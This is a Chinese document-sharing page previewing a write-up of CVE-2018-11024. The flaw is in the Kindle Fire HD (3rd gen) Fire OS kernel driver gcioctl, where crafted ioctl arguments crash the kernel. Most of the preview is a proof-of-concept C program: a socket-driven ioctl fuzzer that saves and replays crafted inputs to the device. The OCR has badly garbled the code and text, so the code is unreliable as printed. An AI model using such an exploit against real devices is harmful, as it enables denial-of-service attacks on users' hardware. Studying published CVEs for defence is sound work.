（CVE-2018-11024）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx

上传人：lao****ou

文档编号：794796

上传时间：2024-05-25

格式：DOCX

页数：15

大小：51.94KB

《（CVE-2018-11024）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx》由会员分享，可在线阅读，更多相关《（CVE-2018-11024）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx（15页珍藏版）》请在第一文库网上搜索。

1、(CVE-2018-11024)AmazonKind1eFireHD(3rd)FireOSkerne1组件安全漏洞一、漏洞简介AmazonKind1eFireHD(3rd)FireOS4.5.5.3的内核组件中的内核模块omapdriversmiscgcxgcioct1gcif.c允许攻击者通过设备/dev上ioct1的参数注入特制参数/gcioct1使用命令1077435789并导致内核崩溃。二、漏洞影响FireOS4.5.5.3三、复现过程poc#inc1ude#inc1ude/str1en#inc1ude#inc1ude/inet_addr#inc1ude/write#inc1ude#i

2、nc1ude#inc1ude#inc1ude#inc1ude/Socketboi1erp1atecodetakenfromhere:http:/seed,ioct1-idjnum-mappingsjnum-b1obsdev-name-1enjdev-namemap_entry_t_arr,b1obs*/intdebug=1;typedefstructintsrc_id;intdst_id;intoffset;map_entry_t;shorttiny_va1s18=128,127,64,63,32,31,16,15,8,7t%3,2,1,0,256,255,-1；int*sma11_va1s;

3、intnum_sma11_va1s;/popu1atessma11_va1swhenca11edvoidpopu1ate_arrs(inttop)intnum=1;intcount=0;whi1e(numtop)/printf(,%dnnum);num=1;sma11_va1s=ma11oc(sizeof(int)*count);memset(sma11_va1s,0,count);inti=0;whi1e(num1)sma11_va1si=num;i+;sma11-va1si=num-1;i+;num=1;sma11_va1si=0;sma11_va1si+1=top;sma11_va1si

4、+2=top-1;sma11_va1si+3=-1;)/generatearandomva1ueofsizesizeandstoreitine1em./va1uehasaweight%chancetobeasma11va1uevoidgen_rand_va1(intsize,char*e1emjintsma11_weight)inti;if(rand()%100)sma11_weight)/dosma11thingunsignedintidx=(rand()%num_sma11_va1s);printf(Choosing%dn,sma11-va1sidx);switch(size)case2:

5、idx=(rand()%18);(short*)e1em=tiny_va1sidx;break;case4:*(int*)e1em=sma11_va1sidx;break;case8:*(1ong1ong*)e1em=sma11_va1sidx;break;defau1t:printf(Damnbro.Size:%dn,jsize);exit(-1);e1sefor(i=0;isize;i+)e1emi=(char)(rand()%0x100);intmain(intargcichar*argv)intnum_b1obs=0,num_mappings=ji=0,dev_name_1en=0,j

6、;unsignedintioct1_id=0;char*dev_name;void*tmp;char*ptr_arr;int*1en_arr;unsignedintseed;intsockfd,c1ient_sockic,read_size;structsockaddr_inserver,c1ient;intmsg_size;void*generic_arr264;/maxva1forsma11_va1sarrayinttop=8192;intent=0;/chancethatourgenericsarefi11edwithsma11va1s,intdefau1t_weight=50;popu

7、1ate_arrs(top);intretest=1;gotorerun;sockfd=socket(AF_INET,SOCK_STREAM,0);if(sockfd=-1)(printf(nCou1dnotcreatesocket);puts(,Socketcreated);setsockopt(sockfd,SO1_SOCKET,SO_REUSEADDR,&(int)1,sizeof(int)；server.sin_fami1y=AF_INET;server.sin_addr.s_addr=INADDR_ANY;server.sin_port=htons(atoi(argv1);/Bind

8、if(bind(sockfdj(structsockaddr*)&server,sizeof(server)0)/printtheerrormessageperror(bindfai1ed.Error*1);return1;puts(,binddone);1isten:/1isten1isten(sockfd,3);puts(Waitingforincomingconnections.);c=sizeof(structsockaddr_in);/acceptconnectionfromanincomingc1ientc1ient_sock=accept(sockfd,(structsockad

9、dr*)&c1ient,(sock1en_t*)&c)；if(c1ient_sock0)(recvtheentiremessagechar*recv_buf=ca11oc(msg_size,sizeof(char);if(recv_buf=NU11)printf(Fai1edtoa11ocaterecv_bufn);exit(-1);intnrecvd=recv(c1ient_sock,recv_bufjmsg_size,0);if(nrecvd!=msg_size)printf(Errorgettinga11data!n);printf(,nrecvd:%dnmsg_size:%dn,nre

10、cvd,msg_size);eit(-1);/quick1ysaveacopyofthemostrecentdataintsavefd=open(sdcardsaved,O_WRON1YO_TRUNCO_CREAT,0644);if(savefd0)perror(opensaved);exit(-1);interr=Write(SaVefd,recv_bufjmsg_size);if(err!=msg_size)perror(writesaved);exit(-1);fsync(savefd);c1ose(savefd);rerun:if(retest)recv_buf=ca11oc(msg_

11、sizejsizeof(char);intfd=open(,sdcardsavedjO_RDON1Y);if(fd0)perror(open:);exit(-1);intfsize=1seek(fd,0,SEEK_END);printf(fi1esize:%dn,fsize);1seek(fdj0,SEEK_SET);read(fdjrecv_buffsize);)char*head=recv_buf;seed=0;/seed,ioct1-idjnum_mappings,num-b1obsjdev_name_1en,dev_name,map_entry_t_arrib1ob-1en-arrjb

12、1obsmemcpy(8tseedjhead,4);head+=4;memcpy(Sioct1-idjhead,4);head+=4;memcpy(&num_mappings,head,4);head+=4;memcpy(Snum-b1obsjhead,4);head+=4;memcpy(&dev_name_1en,head,4);head+=4;/srandwithnewseedsrand(seed);*devname*/dev_name=ca11oc(dev-name-1en+1jsizeof(char);if(dev_name=NU11)printf(Fai1edtoa11ocatede

13、v_namen);exit(-1);)memcpy(dev_name,head,dev_name_1en);head+=dev_name_1en;*map*/map_entry_t*map=ca11oc(num-mappingsjsizeof(map_entry_t);if(map=NU11)printf(Fai1edtoa11ocatemapn);exit(-1);if(num_mappings!=0)memcpy(map,head,num_mappings*sizeof(map_entry_t);head+=num_mappings*sizeof(map_entry_t);)*b1obs*/firstcreateanarraytostorethesizesthemse1ves1en_arr=ca11oc(num-b1obsjsizeof(int);if(1en_arr=NU11)printf(Fai1edtoa11ocat

文档加载中……请稍候！
如果长时间未打开，您也可以点击刷新试试。

下载文档到电脑，查找使用更方便

3 金币 0人已下载

下载	加入VIP,免费下载

版权申诉 word格式文档无特别注明外均可编辑修改；预览文档经过压缩，下载后原文更清晰！ 立即下载

配套讲稿：: 如PPT文件的首页显示word图标，表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
特殊限制：: 部分文档作品中含有的国旗、国徽等图片，仅作为作品整体效果示例展示，禁止商用。设计者仅对作品中独创性部分享有著作权。
关键词：: CVE-2018-11024Amazon Kindle Fire HD 3rd OS kernel组件安全漏洞 CVE 2018 11024 Amazon rd kernel 组件安全漏洞

第一文库网所有资源均是用户自行上传分享，仅供网友学习交流，未经上传用户书面授权，请勿作他用。

关于本文

本文标题：（CVE-2018-11024）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx
链接地址：https://www.001doc.com/doc/794796.html